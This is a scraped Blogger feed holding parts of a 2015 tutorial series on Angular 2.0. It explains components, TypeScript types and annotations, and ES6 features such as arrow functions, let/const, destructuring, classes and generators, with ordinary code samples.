Surprise! You have already seen a complete component in last weeks post about Types. A component is a Controller and View wrapped in a class, so what are the Controller and View in the example above? The answer is that @View is, perhaps unsurprisingly, the View. The Controller is the instance of the PersonComponent, with all properties and methods that go with it.<br />
<br />
A component also has a @Component annotation. This basically means that a class which has the @View and @Component annotations is a Component.<br />
<h1>
Input / Output</h1>
<br />
A property of a component is very clearly defined in terms of input and output.<br />
This means that every piece of input and output must be explicitly defined. This means that if a component requires a directive, that you must explicitly state so, and provide that directive. If the component has a specific event, you want the rest of the world to know of, you must explicitly declare that event. Here is how I visualize a component:<br />
<div style="text-align: center;">
<a href="http://blog.42.nl/wp-content/uploads/2015/07/Angular-component.png"><img alt="Angular-component" class=" wp-image-1271 aligncenter" height="312" src="http://blog.42.nl/wp-content/uploads/2015/07/Angular-component.png" width="521" /></a></div>
<br />
Let's define what Input and Output mean in the context of Components.<br />
<h2>
Input</h2>
<br />
Lets say we have component which uses the NgIf directive inside of its template:<br />
<pre><code class="javascript">import {View, NgIf} from 'angular2/angular2';
@View({
template: `My name: {{ name }}`,
directives: [NgIf]
})</code></pre>
<br />
In order for the NgIf to work we must first import NgIf from angular2 itself. Then we must explicitly declare that the @View uses the NgIf directive by adding it to the "directives" property on the @View annotation.<br />
<br />
Another example is if we have a component which has a property that can be bound to inside of a template. For example: a "name" property on the person component, in order for this to work:<br />
<pre><code class="javascript"><person [name]="firstName"></person></code></pre>
<br />
We must declare our component like this:<br />
<pre><code class="javascript">import {Component} from 'angular2/angular2';
@Component({
selector: 'person',
properties: { name: 'name' }
})</code></pre>
<br />
So in order for the component to have a HTML property we must define it explicitly before hand inside of the "properties" object.<br />
<h2>
Output</h2>
<br />
The output of a component, like input, must be explicitly defined as well. For example if we give our PersonComponent an "upvote" event which can be used like this:<br />
<pre><code class="javascript"><person (upvote)="vote()"></person></code></pre>
<br />
We must declare our component like this:<br />
<pre><code class="javascript">import {Component} from 'angular2/angular2';
@Component({
selector: 'person',
events: ['upvote'}
})</code></pre>
<br />
We must add the "upvote" event to the array of "events" within the @Component.<br />
<h1>
Benefits of Components</h1>
<br />
What are the benefits of components as Angular 2.0 describes them?<br />
<br />
The first benefit is that components are easy to reason with, this is because components are so strictly defined in terms of inputs and outputs. Just by reading the definition of a component it becomes clear what it dependencies are and what events you can subscribe to.<br />
<br />
Having clearly defined components is also great for your text editor and IDE. They can read the definition of your component, and provide you with better autocompletion. But I can also imagine tooling which will analyse your project and tell you which built-in directives you use. In fact the tooling could use that information to strip Angular 2.0 down to the bare core that your application needs.<br />
<br />
Another property that makes components great is that they are composable. You can view components as lego blocks from which you can build more complex things, such as houses, and from houses you can then make an entire city, and so on. Imagine a trashcan button with an "are you sure" message, you can use that throughout many components in your application.<br />
<br />
Components can also be reused quite easily, because they are isolated. For example the trashcan button, it can easily be copied from project A to another project B. Figuring out what the dependencies of the trashcan button are is as simple as looking at its definition.<br />
<h1>
Origin Story</h1>
<br />
Every hero needs a good origin story. The origin of the Component Directive lies in two APIs from Angular 1.x: the directive API and the Controller API. These two APIs had some overlapping use cases:<br />
<div style="text-align: center;">
<a href="http://blog.42.nl/wp-content/uploads/2015/07/Directive-controller-overlap.jpg"><img alt="Directive-controller-overlap" class=" wp-image-1274 aligncenter" height="256" src="http://blog.42.nl/wp-content/uploads/2015/07/Directive-controller-overlap.jpg" width="590" /></a></div>
<br />
<div style="text-align: center;">
</div>
<br />
Many of the user cases for the controller you could implement with directives instead, the inverse is also true, many of the user cases for a directive you could implement with a controller. If you have ever taught Angular 1.x to someone you will often get the question: How do I decide when to use a controller or a directive? This question is very difficult to answer.<br />
<br />
But as it turns out the developers of Angular 1.x really wanted us to use directives a lot more than they wanted us to use controllers. I think that the reason people gravitate to controllers is that most of us come from a traditional MVC background such as Spring MVC or Rails. This makes you are naturally inclined to use "controllers", since that is what you know best.<br />
<br />
So to solve the problem of having two competing APIs and to guide people to using directives, they merged the two APIs into one API to rule them all: the Component Directive.<br />
<br />
When you hear that the controller and directive APIs are dead, you now know that they live on in their love child: the Component Directive.<br />
<h1>
Conclusion</h1>
<br />
Components give us a fundamental new way to build Angular applications, in a composable and reusable way. Components will be the bread and butter of Angular 2.0 applications.<br />
<br />
<a href="http://blog.42.nl/articles/road-angular-2-0-pt-5-bindings/">Next week we will look at "bindings" in Angular 2.0</a>: how multiple components team up to form Angular 2.0 applications, and how information and events flow between components. Then you will understand why angular 2.0 is 3x to 10x faster than an Angular 1.x application!Anonymousnoreply@blogger.com4tag:blogger.com,1999:blog-8962763253387334081.post-32529859402003041402015-07-23T14:00:00.000+02:002016-02-25T12:55:58.795+01:00The Road to Angular 2.0 part 3: Types<h1>Intro</h1><br />
I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0. In this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x. This series of blogposts is a follow up to that presentation. <a href="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular4.png"><img alt="theroadtoangular4" class="alignnone size-full wp-image-1185" height="300" src="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular4.png" width="615" /></a><br />
<h1>Types</h1><br />
Last <a href="http://blog.42.nl/articles/the-road-to-angular-2-0-pt2-es6/">week we looked at ES6</a>, the next version of JavaScript, and how it is going to change the way we write our Angular 2.0 code. However ES6 was not enough for the Angular 2.0 team. They wanted to add types and annotations to JavaScript. So what the Angular team did was create their own language, called AtScript, which compiled down to JavaScript, which included types and annotations. Microsoft was also working on a language with types which transpiles back to ES5. That language is called TypeScript, and has been developed since 2012. The only thing TypeScript missed, according to the Angular 2.0 team, were annotations. So the two teams got together and the Angular team convinced the TypeScript folks to add annotations. Now there was no more need for AtScript, and it was abandoned in favor for TypeScript. Why create your own language when there is already a better alternative?<br />
<br />
<a name='more'></a><br />
<br />
<h1>TypeScript</h1><br />
<a href="http://www.typescriptlang.org/">TypeScript</a> is a superset of JavaScript, this means that all valid ES5 is valid TypeScript code. This means you can copy and paste the JS you write today and paste it in a TypeScript file and it will just work. Of course TypeScript also adds functionality such as types and annotations that do not have an equivalent in JavaScript. Hence not all valid TypeScript is valid JavaScript. Visually TypeScript looks something like this:<br />
<div style="text-align: center;"><a href="http://blog.42.nl/wp-content/uploads/2015/07/TypeScript.jpg"><img alt="TypeScript" class=" wp-image-1228 aligncenter" height="363" src="http://blog.42.nl/wp-content/uploads/2015/07/TypeScript.jpg" width="362" /></a></div><br />
TypeScript is a superset of ES5, it wraps ES6, so you can use all ES6 features, and on top of that it adds types and annotations.<br />
<h1>Types</h1><br />
In TypeScript you can add static types to JavaScript code. Consider the following example:<br />
<pre><code class="javascript">function greeter(name: string) : string {
return "hi there " + name;
}
greeter('Maarten'); // Hi there Maarten</code></pre><br />
As you can see the type of the 'name' parameter, of the greeter function, is type string. The return value of the greeter function is a string as well. Trying to give a number to the greeter function results in a type error at runtime:<br />
<pre><code class="javascript">greeter(10); // error: Argument of type 'number' is not assignable to parameter of type 'string'.</code></pre><br />
Types are not limited only to primitives, you can also use 'classes' as types:<br />
<pre><code class="javascript">class Person {
name: string;
age: number;
constructor(name: string, age: number) {
this.name = name;
this.age = age;
}
}
var maarten = new Person('Maarten', 26);
var jarno = new Person('Jarno', 55);
var eric = new Person('Eric', 14);
var persons: Array<Person> = [maarten, jarno, eric];</code></pre><br />
In the above example you can see how the the array named 'persons' only accept objects of type 'Person'. Basically how generics works in C# and Java and other strongly typed languages.<br />
<h1>Annotations</h1><br />
One of the reasons for the Angular team to stop working on AtScript is that TypeScript 1.5 promised to include annotations. Lets dive into what annotations can do by looking at some Angular 2.0 code:<br />
<pre><code class="javascript">import {Component, View} from 'angular2/angular2';
@Component({
selector: 'person'
})
@View({
template: `<p>My name: {{ name }}</p>`
})
class PersonComponent {
name: string;
friends: Array<string>;
constructor(name: string) {
this.name = name;
}
}</code></pre><br />
Annotations are always prefixed with the @ symbol. This means that in the code above there are two annotations: @Component and @View. Note that you can also define your own annotations if you want to, @Component and @View are not "built" into TypeScript, they were created by the Angular team. What an annotation does is decorate a class with extra functionality in a very succinct way. With very little code you can add great a great deal of functionality. Lets look at the @Component and @View annotations from the example above to demonstrate this.<br />
<h2>@Component</h2><br />
@Component tells Angular how it should recognize a component. In this case that it should recognize a PersonComponent whenever it sees an HTML element called person. So if you have the following code inside of a HTML template:<br />
<pre><code class="javascript"><person></person></code></pre><br />
Angular will instantiate a PersonComponent.<br />
<h2>@View</h2><br />
The @View annotation tells Angular what the template for a particular component is. In the case of the code snippet that defined a PersonComponent, the templates is a HTML paragraph (<p>) with a binding to 'name'. Note that you could also put your template in a separate file and use templateUrl to retrieve the template, just like you could do in Angular 1.x.<br />
<h1>Benefits of Types</h1><br />
We have now seen some TypeScript in action including static types and annotations. But what makes ‘types’ so great? After all we have been using JavaScript for years without the need for types at all. So why have types at all?<br />
<h2>IDE and text editors love types</h2><br />
The more static information you provide an IDE the better it can help you write your code. Static types enable better autocompletion, better refactoring support and better code navigation. For example: when your editor sees you writing a function and it knows that it takes two numbers and returns a string, it can show a popup window with that information:<br />
<div style="text-align: center;"><img alt="typescript-typehint" class="size-full wp-image-1232 aligncenter" height="49" src="http://blog.42.nl/wp-content/uploads/2015/07/typescript-typehint.png" style="line-height: 1.5em;" width="494" /></div><br />
For the TypeScript team this extra productivity gain is very important. They even provide ways to autocomplete code that was not written in TypeScript. They do this by creating files that annotate other open source libraries or frameworks by defining TypeScript <a href="http://www.typescriptlang.org/Handbook#interfaces">interfaces </a>for them. These files have the .d.ts extension, where ts stands for TypeScript and .d. for definition, and can be used to make your life easier. There is even a GitHub repository with high quality .d.ts files: <a href="https://github.com/borisyankov/definitelytyped">https://github.com/borisyankov/DefinitelyTyped</a><br />
<h2>Types help you show your intent</h2><br />
Types are not only useful for IDEs, you the human programmer has benefit from them as well. Having type information makes it easier to reason about other people’s code, and even your own code three months down the line.<br />
<h1>Is TypeScript required?</h1><br />
TypeScript is not required by Angular 2.0 you can still write ES5 or ES6, and even Dart and never use TypeScript at all. Which is also what the official docs at <a href="https://angular.io/">angular.io</a> are saying, in fact they show ES5 examples next to every TypeScript example. That being said I think writing ES5 or ES6 is not going to be feasible, because I think every tutorial on Angular 2.0 is simply going to assume you use TypeScript. So if you insist on using ES5 or ES6, you will constantly have to rewrite TypeScript examples from the web back to ES5 or ES6 yourself.<br />
<br />
I think it is best that you bite the bullet and use TypeScript. But since TypeScript is a superset of JavaScript you can choose when to use TypeScript and when to use pure JavaScript. You can mix and match as you please, this is especially handy when migrating from Angular 1.x to 2.0, but more on that in a later blog post.<br />
<h1>In what language is Angular 2.0 is written?</h1><br />
Ever wonder why Angular 1.x is called AngularJS and Angular 2.0 is just Angular 2.0 sans the JS? That is because Angular is no longer just a JavaScript framework, instead it supports multiple languages. Angular 2.0 will support: ES6, ES5, TypeScript and Dart. Dart is a Language by Google that was supposed to transplant JavaScript as the scripting language of the browser. Recently Google <a href="http://news.dartlang.org/2015/03/dart-for-entire-web.html">announced</a> they will not add Dart to Chrome but will transpile Dart to JavaScript instead. So what do they write Angular 2.0 itself in? The answer is in TypeScript, but they have Dart and JS Facades that help compile Angular 2.0 to JS and Dart versions. Here is a infographic from the Angular 2.0 team that shows how that works:<br />
<div style="text-align: center;"><a href="http://blog.42.nl/wp-content/uploads/2015/07/Angular-2.0-pipeline.png"><img alt="Angular 2.0 pipeline" class="size-full wp-image-1234 aligncenter" height="512" src="http://blog.42.nl/wp-content/uploads/2015/07/Angular-2.0-pipeline.png" width="666" /></a></div><br />
You can read the graph as follows: Angular 2.0 is programmed in TypeScript (utmost left) and there are two facades one for JavaScript and one for Dart. The purpose of these facades is making it possible to write idiomatic API's for code for both JS and Dart. This means that both languages get Angular's API in a form that is best suited for that language. From there the <a href="https://github.com/google/traceur-compiler">traceur</a> compiler outputs JavaScript and Dart versions of the framework.<br />
<br />
When you write Angular 2.0 in Dart you write your application with Dart, using the Dart Angular API facade. This is what the two yellow 'Dart' blocks represent in the lower part of the graph.<br />
<br />
When you choose to write your Angular 2.0 code in JavaScript you can choose between ES5, ES6 and TypeScript. But you will use the JavaScript API for all three of them. This is what the blue 'JS' part in the top part of the graph represents.<br />
<h1>One CLI(hopefully) to rule them all</h1><br />
A colleague of mine asked my while he was reviewing this blogpost: "What do I have to do to use TypeScript in Angular 2.0?". Which is a valid question, after all we have seen this complex graphs with all these facades, but we have no idea on how to use it in our projects.<br />
<br />
The answer is that there is <strong>no</strong> answer yet on how to best build an Angular 2.0 project. But there is hope, the Angular team got together with the React team to discus common ground, and in the <a href="https://docs.google.com/document/d/1QZxArgMwidgCrAbuSikcB2iBxkffH6w0YB0C1qCsuH0/edit?pli=1">notes</a>, Igor from the Angular team, discusses the need for a Command Line Interface (CLI). He states that the Angular is building a CLI that will, and I quote:<br />
<ol><li>Scaffold.</li>
<li>Skeleton files</li>
<li>Set up build</li>
<li>Set up testing environment</li>
</ol><br />
By "Scaffold" I think Igor means generating entire base Angular projects, and by "Skeleton files" generating very specific files such as unit test, e2e test and services. "Set up build" probably mean setting up TypeScript, Dart, ES5 or ES6 depending on the language that you choose. "Set up testing environment" means that it will setup karma and protractor for unit and e2e tests.<br />
<br />
The Angular 2.0 team took a page from the <a href="http://emberjs.com/">Ember</a> playbook, because Ember has had <a href="http://www.ember-cli.com/">CLI</a> for quite some time. The effect of having a CLI which has first class support and is created the Ember team itself, means that every Ember application out there, uses the same infrastructure to build Ember applications. Plus the Ember build system supports <a href="http://www.emberaddons.com/">plugins</a>, built on top of the 'default' CLI. This makes for a very powerful standardised way to build Ember applications. Having a big community that uses same tools makes these tools better.<br />
<br />
From the meeting notes it is clear that the Angular team is working with the Ember guys to kickstart their own CLI:<br />
<blockquote>We’re working with the Ember CLI team who are extracting reusable bits. Working with Joe from broccoli and reusing those bits. Current changing the Angular build from gulp to broccoli. Working with the NPM team on package management and resolution. The package managers that exist today aren’t good, but NPM is the closest of all of them.</blockquote><br />
How this CLI will work exactly is currently still unknown, when there is more information available expect an update from me. That being said I think this is the Angular CLI is a very positive development for us, the Angular community..<br />
<h1>Want to know more?</h1><br />
TypeScript adds a lot more functionality on top of JavaScript which I have not covered in this blogpost. Here are some TypeScript resources:<br />
<ul><li><a href="http://www.typescriptlang.org/Handbook">The official TypeScript handbook</a></li>
<li><a href="http://www.typescriptlang.org/Content/TypeScript%20Language%20Specification.pdf">The 1.4 specs (note that annotations come in 1.5), for when you really want to get down and dirty.</a></li>
<li><a href="http://www.typescriptlang.org/Playground">The TypeScript playground, here you can interactively try out TypeScript in the browser</a></li>
</ul><br />
<h1>Conclusion</h1><br />
TypeScript was included into Angular 2.0 to allow us to statically define types, which help us write more readable code. TypeScript also includes annotations which allows us to write very little code but achieve much. It gives our IDEs type information to help us be more productive by providing better autocompletion.<br />
<br />
So even though you are not forced to use TypeScript I definitely recommend that you do.<br />
<br />
We've also seen that Angular 2.0 is no longer a pure "JavaScript" framework but that it supports multiple languages: JavaScript (ES6, and ES5), TypeScript and Dart. The new "CLI" will hopefully make it easy to setup Angular 2.0 projects in a way that the whole Angular community can benefit from it.<br />
<br />
In previous weeks and this weeks we have been looking at some mechanical changes in Angular. Things that simply change the way we write Angular, <a href="/2015/07/the-road-to-angular-20-part-4-components.html">next week we are going to look at components</a>, which will change the way we think about Angular.Anonymousnoreply@blogger.com4tag:blogger.com,1999:blog-8962763253387334081.post-77529229440300016522015-07-16T14:23:00.000+02:002015-12-29T13:33:45.392+01:00The Road to Angular 2.0 part 2: ES6<h1>
Intro</h1>
<br />
I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0. In this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x.<br />
<br />
This series of blogposts is a follow up to that presentation.<br />
<br />
<img alt="theroadtoangular3" class="alignnone size-full wp-image-1183" height="300" src="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular3.png" style="line-height: 1.5em;" width="615" /><br />
<h1>
ES6</h1>
<br />
<a href="http://blog.42.nl/articles/the-road-to-angular-2-0-pt1-template-syntax/">Last week we discussed the new template syntax in Angular 1.x</a>. This week it is time to discus ES6 and how it affects Angular 2.0.<br />
<br />
ECMAScript 6 is the next version of JavaScript. The specs have been frozen and now it is up to the browser vendors to implement them. ES6 brings us some exiting new features. Let's take a whirlwind tour and look at some of them.<br />
<br />
<a name='more'></a><br /><br />
<h1>
Whirlwind tour</h1>
<br />
<h2>
Fat Arrows</h2>
<br />
JavaScript is becoming more 'functional' in each iteration. ES5 added: <a href="https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Array/map">map</a>, <a href="https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Array/reduce">reduce</a>, <a href="https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Array/filter">filter</a> and more. These functions take other functions as arguments. The functions that are passed in as arguments become less readable when they are inlined. For example this is quite verbose:<br />
<pre><code class="javascript">var doubled = [1, 2, 3, 4, 5].map(function(x) {
return x * x;
};</code></pre>
<br />
With ES6's 'fat arrow' notation, writing lambda expression (anonymous functions) becomes really easy:<br />
<pre><code class="javascript">var doubled = [1, 2, 3, 4, 5].map((x) => x * x);</code></pre>
<br />
Fat arrow was created to allows us to write really short function definitions. Let's look and break down another example:<br />
<pre><code class="javascript">var square = x => x * x;
console.log(square(5)); // -> 25</code></pre>
<br />
Here you can see the function 'square' being defined as: x => x * x. What this says is: define a function with one parameter called x, which evaluates to x * x. The value of the expression is implicitly the return value, so there is no need for a return statement.<br />
<br />
You can also define functions which take multiple parameters like so:<br />
<pre><code class="javascript">var add = (a, b) => a + b;
console.log(add(10, 5));</code></pre>
<br />
When creating a function with multiple parameters you must define them within parentheses.<br />
<br />
You can also have multiple statements within a fat arrow by using brackets:<br />
<pre><code class="javascript">var squareAndPrint = x => {
var squared = x * x;
console.log(squared);
return squared;
};
var fourSquared = squareAndPrint(4); // Prints 16 and returns 16</code></pre>
<br />
The fat arrow also has one other nice property: it doesn't change the 'this' context. Compare and contrast the following ES5 and ES6 code:<br />
<pre><code class="javascript">// ES5
var maarten = {
name: 'Maarten',
age: 25,
birthDay: function() {
console.log(this.name + ' is ' + this.age);
var self = this; // setTimeout changes this context, so keep it safe.
setTimeout(function() {
self.age += 1;
console.log(self.name + ' is ' + self.age);
}, 1000);
}
}
maarten.birthDay();
// Prints Maarten is 25
// Prints Maarten is 26
// ES6
var bert = {
name: 'Bert',
age: 65,
// ES6 Enhanced object literal allows for each function definitions
birthDay() {
console.log(`${this.name} is ${this.age}`); // ES6 template strings
setTimeout(() => {
this.age += 1;
console.log(`${this.name} is ${this.age}`);
}, 1000);
}
}
bert.birthDay();
// Prints Bert is 65
// Prints Bert is 66</code></pre>
<br />
setTimeout normally changes the 'this' context, which is why in ES5 you often bind 'this' to some variable for later use. In the example this variable was called 'self'. The fat arrow keeps the outer 'context' of where it was called, in the example above 'bert' would be 'this'. This makes 'this' act a little more as you would expect it to work. For more info see: <a href="https://developer.mozilla.org/en-us/docs/web/javascript/reference/functions/arrow_functions">https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Functions/Arrow_functions</a><br />
<h2>
Const</h2>
<br />
In ES6 you can define constants which cannot be reassigned via the 'const' keyword:<br />
<pre><code class="javascript">const PI = 3.14;
PI = 15 // Error PI is readonlyconst PI = 3.15;</code></pre>
<br />
Constants cannot be reassigned, but they can be changed:<br />
<pre><code class="javascript">const names = [];
names.push('Sander');
names.push('Stefan');
console.log(names); // prints ['Sander', 'Stefan'];</code></pre>
<br />
Constants are lexically scoped:<br />
<pre><code class="javascript">function greet(greeting) {
const NAME = 'Maarten';
console.log(greeting + ' ' + NAME);
}
greet('Howdy!'); // logs: Howdy! Maarten
console.log(NAME); // NAME is not defined</code></pre>
<br />
NAME is created inside the scope for the greet function. Outside of the greet functions NAME is not defined.<br />
<h2>
Let</h2>
<br />
'let' is a lot like 'var' except it is scoped to the 'nearest' closing block. For example:<br />
<pre><code class="javascript">if (true) {
let x = 10;
console.log(x);
}
console.log(x); // Error 'x' is not defined in this scope</code></pre>
<br />
Here you can see that 'x' is only available inside the 'if' block because that is where the 'x' was defined. If x was defined with a var however, the number 10 would have been printed twice. So let allows you to scope variables more tightly.<br />
<br />
However let definitions are accessible in child scopes:<br />
<pre><code class="javascript">let x = 'hello';
console.log(x); // prints 'hello';
if (true) {
console.log(x); // prints 'hello'
}
console.log(x); // prints 'hello';</code></pre>
<br />
Redefining a let in a child scope does not affect the outer scope's let definition, because a let is defined per scope, for example:<br />
<pre><code class="javascript">let x = 'hello';
console.log(x); // prints 'hello';
if (true) {
let x = 10;
console.log(x); // prints 10
}
console.log(x); // Still prints 'hello';</code></pre>
<br />
When you try to redefine a 'let' in a child scope by using the 'let' from the parent scope you get a ReferenceError:<br />
<pre><code class="javascript">let x = 'hello';
console.log(x); // prints 'hello';
if (true) {
let x = x + ' world!';
console.log(x); // ReferenceError: can't access lexical declaration `x' before initialization
}</code></pre>
<br />
This can be explained because in the statement: let x = x + ' world!' the second 'x' refers to the 'let x' before the statement, and not the let x = 'hello' in the scope above. Within x + ' world!' the let is still uninitialized which causes the error.<br />
<h2>
Destructuring</h2>
<br />
Destructuring makes it easy to get values from complex objects and assign them to variables.<br />
<br />
For example to get certain properties from an object and assign them:<br />
<pre><code class="javascript">let frame = {
x: 10,
y: 200,
width: 100,
height: 300
};
let {x, y} = frame;
console.log(x); // prints 10
console.log(y); // prints 200</code></pre>
<br />
You can do the same thing for 'positions' in an array:<br />
<pre><code class="javascript">let tuple = ['Maarten', 16, 1989];
let [name, age, birthYear] = tuple;
console.log(name); // prints 'Maarten'
console.log(age); // prints 16
console.log(birthYear); // prints 1989</code></pre>
<br />
You can use destructuring on a functions parameters too:<br />
<pre><code class="javascript">let frame = {
x: 10,
y: 200,
width: 100,
height: 300
};
function moveBy({x, y, width, height}, [dx, dy]) {
return {
x: x + dx,
y: y + dy,
width, // In ES6 this is equivalent to width: width,
height // In ES6 this is equivalent to height: height,
};
}
frame = moveBy(frame, [10, 10]);
console.log(frame); // prints {x: 20, y: 210, width: 100, height: 300}</code></pre>
<br />
In the example above you can see both array and object destructuring happen in the moveBy function. What makes destructuring powerful is that it allows you to program to the 'shape' of the data structure. One thing about destructuring objects is that you can name the binding whatever you want. For instance, you could rewrite moveBy to this:<br />
<pre><code class="javascript">function moveBy({x: oldX, y: oldY, width, height}, [dx, dy]) {
return {
x: oldX + dx,
y: oldY + dy,
width, // In ES6 this is equivalent to width: width,
height // In ES6 this is equivalent to height: height,
};
}</code></pre>
<br />
Whatever the 'value' of the key is becomes the binding for the variable in the function. So<br />
<br />
what {x: oldX} says is: there's a key called x in the first parameter and I want to name it oldX.<br />
<h2>
Classes</h2>
<br />
JavaScript has prototypical inheritance, which makes it stand out from other languages, which use the more traditional classical inheritance such as C++, Java, Ruby, Python, C# and Objective-C. People coming from those languages would often create libraries that would use JavaScripts prototypical inheritance to mimic the more traditional classical inheritance.<br />
<br />
ES6 gives us some syntactic sugar to make the more traditional classical inheritance possible, without having to use a library. It is important to note that behind the scenes 'classes' are still implemented using prototypical inheritance. Here an example:<br />
<pre><code class="javascript">class Living {
constructor(alive) {
this._alive = alive;
}
get isAlive() {
return this._alive;
}
set alive(value) {
this._alive = value;
}
}
class Human extends Living {
constructor(name) {
super(true);
this.name = name;
}
sayHi() {
if (this.isAlive) {
console.log(`${this.name} says hi!`);
} else {
console.log('What is dead may never die!');
}
}
}
var human = new Human('Maarten');
human.sayHi(); // prints Maarten says hi!
human.alive = false;
human.sayHi(); // prints What is dead my never die!
console.log(human instanceof Living); // prints true
console.log(human instanceof Human); // prints true</code></pre>
<br />
The function 'constructor' is the constructor for that class, you cannot add multiple constructors via method overloading.<br />
<ul><br />
<li> 'super' is used to call the parent constructor, in Human's case that is Living.</li>
<br />
<li>The 'get' before isAlive means isAlive is a computed property. See <a href="https://developer.mozilla.org/en-us/docs/web/javascript/reference/functions/get">get</a>. This makes this.isAlive possible without parenthesis.</li>
<br />
<li>The 'set' before alive means you can <a href="https://developer.mozilla.org/en-us/docs/web/javascript/reference/functions/set">set</a> the value via assignment. This makes human.alive = false possible.</li>
<br />
<li>You can only extend one class at a time, multiple inheritance is not possible.</li>
</ul>
<br />
<h2>
Generators</h2>
<br />
Generators are complex creatures that allow for some pretty awesome functionality. I doubt that you ever need to write a generator yourself, but frameworks creators can use it to make your life easier.<br />
<br />
So what is a generator? A generator is a function that can be paused mid execution to give or receive values. It does so via the 'yield' keyword. Lets look at a simple generator:<br />
<pre><code class="javascript">// The '*' denotes that threeCounter is a generator
function *threeCounter() {
yield 1;
yield 2;
yield 3;
}
// Create an instance of actual generator by calling it.
let counter = threeCounter();
console.log(counter.next().value); // prints 1
console.log(counter.next().value); // prints 2
console.log(counter.next().value); // prints 3
console.log(counter.next().value); // prints undefined
console.log(counter.next()); // prints {value: undefined, done: true}</code></pre>
<br />
In the example above we define a generator called threeCounter, it will give a number when it is called, after it has been called three times it is done. When you call counter.next you are given an object, the object has two properties: value and done, value is what the generator yielded, and done is a boolean which says if the generator has any new values to give.<br />
<br />
You can instantiate a generator as many times as you want:<br />
<pre><code class="javascript">let a = threeCounter();
let b = threeCounter(); // 'b' is completely separate from 'a'
console.log(a.next()); // prints {value: 1, done: false}
console.log(a.next()); // prints {value: 2, done: false}
console.log(b.next()); // prints {value: 1, done: false}</code></pre>
<br />
Each generator you create acts independently from other generators of the same type. I would like to say that calling a generators creates "instances" of that generators, like calling new on a class would. Perhaps it would have been better if generators were created with the 'new' keyword as well.<br />
<br />
A generator is also an iterator, this means we can use it inside for each loops:<br />
<pre><code class="javascript">for (let number of threeCounter()) {
console.log(number);
}</code></pre>
<br />
You can make generators that never stop providing values, for instance here's a generator which creates class names for a zebra striped tables:<br />
<pre><code class="javascript">function *zebraGenerator() {
const GRAY = '.gray';
const WHITE = '.white';
let color = GRAY;
while(true) {
if (color === GRAY) {
yield color;
color = WHITE;
} else {
yield color;
color = GRAY;
}
}
}
let zebra = zebraGenerator();
console.log(zebra.next().value); // prints '.gray'
console.log(zebra.next().value); // prints '.white'
console.log(zebra.next().value); // prints '.gray'
console.log(zebra.next().value); // prints '.white'</code></pre>
<br />
So even though the zebraGenerator has a while(true), it doesn't run in an infinite loop, it stops each time there is a yield and provides the caller with a color.<br />
<br />
We've seen how we can get value's from a generator but we can also provide generators with values:<br />
<pre><code class="javascript">function massiveCalculation(generator) {
setTimeout(() => {
generator.next(42);
}, 5000);
}
function *resultPrinterGenerator(name) {
console.log(`=== ${name} ===`);
console.log('Started on: ' + new Date().toString());
var result = yield;
console.log(`The answer is: ${result}`);
console.log('Stopped on is: ' + new Date().toString());
console.log(`=== ${name} ===`);
}
var resultPrinter = resultPrinterGenerator('massiveCalculation');
/*
Quirk: you have to call 'next' at least once before you
can send a value to a generator.
*/
resultPrinter.next();
massiveCalculation(resultPrinter);
/* Console output:
=== massiveCalculation ===
Started on: Wed May 15 2015 12:51:49 GMT+0200 (CEST)
The answer is: 42
Stopped on is: Wed May 15 2015 12:51:54 GMT+0200 (CEST)
=== massiveCalculation ===
*/</code></pre>
<br />
I know this example above is kind of contrived, but it demonstrates how to send values from the outside to the generator by using generator.next(42). You can also see that you can pass parameters to the generator function itself. In the above example I gave the string 'massiveCalculation' as a parameter, so the printer could make a nice header.<br />
<br />
Passing values to generators is typically something library creators use to make our lives easier. For example:<br />
<pre><code class="javascript">import csp from 'js-csp';
csp.go(function* () {
let element = document.querySelector('#uiElement1');
let channel = listen(element, 'mousemove');
while (true) {
let event = yield csp.take(channel);
let x = event.layerX || event.clientX;
let y = event.layerY || event.clientY;
element.textContent = `${x}, ${y}`;
}
});</code></pre>
<br />
This is from a library called<a href="https://github.com/ubolonton/js-csp"> js-csp</a>, with it you can create Go like channels. In the example above<br />
<br />
a channel for 'mousemove' events is created, and it is consumed using yield to print the location<br />
<br />
of the mouse. With channels you can implement consumer and producer like patterns to manage<br />
<br />
asynchronous events.<br />
<br />
Another cool example uses generators make asynchronous code look like synchronous code:<br />
<pre><code class="javascript">co(function* () {
try {
let [croftStr, bondStr] = yield Promise.all([
getFile('http://localhost:8000/croft.json'),
getFile('http://localhost:8000/bond.json'),
]);
let croftJson = JSON.parse(croftStr);
let bondJson = JSON.parse(bondStr);
console.log(croftJson);
console.log(bondJson);
} catch (e) {
console.log('Failure to read: ' + e);
}
});</code></pre>
<br />
This "co" function comes from the <a href="https://github.com/tj/co">Co library</a>, it lets you yield promises to "co" so it can handle the asynchronous parts of the code. It will resume running the code once all promises are resolved, this way you don't have to write the then or error functions. This makes the code look synchronous, which makes the code easier to understand.<br />
<br />
<a href="http://www.2ality.com/2015/03/es6-generators.html">Here is a really exhaustive look at generators</a> from ES6 guru <a href="http://rauschma.de/">Dr. Axel Rauschmayer</a>.<br />
<br />
Of course Co is just a bridge until ES7's '<a href="http://jakearchibald.com/2014/es7-async-functions/">await</a>' syntax arrives!<br />
<h2>
Modules</h2>
<br />
So there is a lot of cool new stuff in ES6, but there is still one problem: how are you going to share all the classes, generators, and variables you have made? Until a couple of years ago the most common way was to give people a JS file and namespace your code, something like this:<br />
<pre><code class="javascript">var $ = (function() {
var m = {};
var _p = 10; // private value do not touch!
m.awesome = function(b) {
return _p * b;
};
return m;
}());</code></pre>
<br />
This way you had private variables and created an API you exposed to some global variable. There are many downsides to this approach:<br />
<ul><br />
<li>Name clashes with if some other library uses the $ sign other than you</li>
<br />
